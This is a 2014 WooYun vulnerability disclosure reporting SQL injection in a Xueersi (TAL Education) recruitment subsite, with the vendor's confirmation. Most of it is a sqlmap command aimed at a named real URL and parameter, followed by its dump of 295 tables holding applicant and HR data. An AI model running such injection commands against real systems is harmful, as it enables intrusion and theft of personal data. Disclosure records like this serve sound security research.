当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077548

漏洞标题:学而思某业务SQL注入漏洞

相关厂商:好未来集团学而思培优

漏洞作者: 宝-宝

提交时间:2014-09-27 17:50

修复时间:2014-11-11 17:52

公开时间:2014-11-11 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-27: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-11: 细节向公众公开

简要描述:

某分站未过滤,导致SQL注入漏洞,可脱裤

详细说明:

sqlmap -u "http://job.100tal.com/?systemjobtype=1" -v 1 --tables -D "job.xueersi.org"
当前数据库:job.xueersi.org
----------------------------------------------------------------------
Database: job.xueersi.org
[295 tables]
+----------------------------------+
| function |
| user |
| activity |
| activity_user |
| approval |
| approval_apply |
| approval_apply_flow |
| approval_apply_flow_log |
| approval_apply_master |
| approval_flow |
| approval_process |
| authorize |
| company_contact |
| company_contact_group |
| company_news |
| company_organize |
| function_invite_exam |
| function_invite_exam_online |
| function_invite_hire |
| function_invite_interview |
| function_invite_interview_online |
| function_notice_healthy |
| function_report_background |
| function_report_entry |
| function_report_exam |
| function_report_filter |
| function_report_fire |
| function_report_healthy |
| function_report_hire |
| function_report_hire_suggest |
| function_report_interview |
| function_report_interview_call |
| function_report_try |
| g_51job |
| g_accept_travel |
| g_apply_day |
| g_area |
| g_arrived |
| g_blood |
| g_certificate |
| g_chinahr |
| g_cjol |
| g_common_word_type |
| g_company_size |
| g_company_type |
| g_constellation |
| g_custom_column_show |
| g_custom_talent_type |
| g_custom_type |
| g_degree |
| g_delivery |
| g_dictionary |
| g_diploma |
| g_discipline |
| g_edu_system |
| g_equest |
| g_ethnic |
| g_filter_type |
| g_gender |
| g_homepage_module |
| g_job_apply_reason |
| g_job_channel |
| g_job_level |
| g_job_nature |
| g_job_trade |
| g_job_type |
| g_language |
| g_language_certificate |
| g_marital_status |
| g_msg_type |
| g_normal_tool |
| g_order |
| g_other |
| g_pinyin |
| g_political |
| g_relations_company |
| g_relations_family |
| g_relations_proved |
| g_religion |
| g_resume_require |
| g_resume_status |
| g_resume_tpl_type |
| g_salary_condition |
| g_school |
| g_school_211 |
| g_school_985 |
| g_search_condition |
| g_skill_level |
| g_suggestion |
| g_tpl_mail_sms_type |
| g_wish |
| g_zhaopin |
| headhunter |
| headhunter_job |
| headhunter_resume |
| headhunter_resume_attach |
| headhunter_resume_attachment |
| headhunter_resume_certificate |
| headhunter_resume_company_friend |
| headhunter_resume_custom_answer |
| headhunter_resume_education |
| headhunter_resume_experience |
| headhunter_resume_family |
| headhunter_resume_intent |
| headhunter_resume_internship |
| headhunter_resume_language |
| headhunter_resume_life_according |
| headhunter_resume_mynet |
| headhunter_resume_other |
| headhunter_resume_paste |
| headhunter_resume_professional |
| headhunter_resume_project |
| headhunter_resume_relationship |
| headhunter_resume_search |
| headhunter_resume_skill |
| headhunter_resume_training |
| hr |
| hr_activity |
| hr_custom_column |
| hr_custom_search |
| hr_doc |
| hr_fav |
| hr_fav_user |
| hr_group |
| hr_homepage |
| hr_online |
| hr_plan |
| hr_plan_related |
| hr_post |
| hr_report |
| hr_task |
| hr_task_transferred |
| hr_workload |
| info_mail |
| info_msg_read |
| info_msg_send |
| info_sms |
| job |
| job_assign |
| job_auto_report |
| job_cas |
| job_channel |
| job_custom |
| job_delivery_log |
| job_desc_split |
| job_filter |
| job_master |
| job_publish |
| job_stage |
| job_tag |
| job_user |
| log_batch_import |
| log_batch_import_user |
| log_hr |
| log_login |
| log_process |
| log_recommend |
| log_sms_add |
| log_transmit |
| micro_type |
| nav |
| orelease_job |
| orelease_log |
| osearch_account |
| osearch_er |
| osearch_log |
| osearch_resume |
| osearch_site |
| paper |
| paper_answer |
| paper_credibility |
| paper_exam |
| paper_history |
| paper_invite_activity |
| paper_question |
| paper_relation |
| person |
| person_email |
| person_lock |
| person_mobile |
| person_reviews |
| person_tag |
| place_room |
| place_room_use |
| place_room_use_person |
| pool_resume |
| post |
| post_history |
| power |
| power_need |
| power_relation |
| power_role |
| process |
| process_function |
| process_stage |
| qlogin |
| qlogin_log |
| report_custom |
| report_data |
| report_helper |
| resume |
| resume_attach |
| resume_attachment |
| resume_cas |
| resume_cas_add |
| resume_certificate |
| resume_company_friend |
| resume_custom_answer |
| resume_education |
| resume_experience |
| resume_family |
| resume_intent |
| resume_internship |
| resume_language |
| resume_life_according |
| resume_mynet |
| resume_other |
| resume_paste |
| resume_professional |
| resume_project |
| resume_relationship |
| resume_search |
| resume_skill |
| resume_training |
| site |
| stage |
| stage_tag |
| stage_tag_function |
| statistics_y |
| statistics_ym |
| statistics_ymd |
| system_config |
| system_contract |
| system_custom |
| system_custom_title |
| system_custom_title_option |
| system_identitycheck |
| system_identitycheck_log |
| system_interview |
| system_job_level |
| system_job_type |
| system_mail |
| system_set |
| system_sms |
| system_sms_log |
| system_sms_payment_log |
| system_tool |
| system_user_from |
| system_user_type |
| tag |
| talent_blacklist |
| talent_blacklist_person |
| talent_member |
| talent_reserve |
| talent_reserve_type |
| talent_vip |
| talent_vip_group |
| te_download |
| te_share |
| third_webservice_log |
| timer_log |
| tpl_common_word |
| tpl_job |
| tpl_mail_sms |
| tpl_print |
| tpl_process |
| tpl_resume |
| uncontact_resume |
| uncontact_resume_attach |
| uncontact_resume_attachment |
| uncontact_resume_certificate |
| uncontact_resume_company_friend |
| uncontact_resume_custom_answer |
| uncontact_resume_education |
| uncontact_resume_experience |
| uncontact_resume_family |
| uncontact_resume_intent |
| uncontact_resume_internship |
| uncontact_resume_language |
| uncontact_resume_life_according |
| uncontact_resume_mynet |
| uncontact_resume_other |
| uncontact_resume_paste |
| uncontact_resume_professional |
| uncontact_resume_project |
| uncontact_resume_relationship |
| uncontact_resume_search |
| uncontact_resume_skill |
| uncontact_resume_training |
| user_apply |
| user_nojob |
| user_paper |
| user_paper_question |
| user_resume |
| user_subscribed |
+----------------------------------+

漏洞证明:

333.png

123.png


修复方案:

你们比我更懂,,,过滤 过滤

版权声明:转载请注明来源 宝-宝@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-29 10:16

厂商回复:

修复中,谢谢支持

最新状态:

暂无


漏洞评价:

评论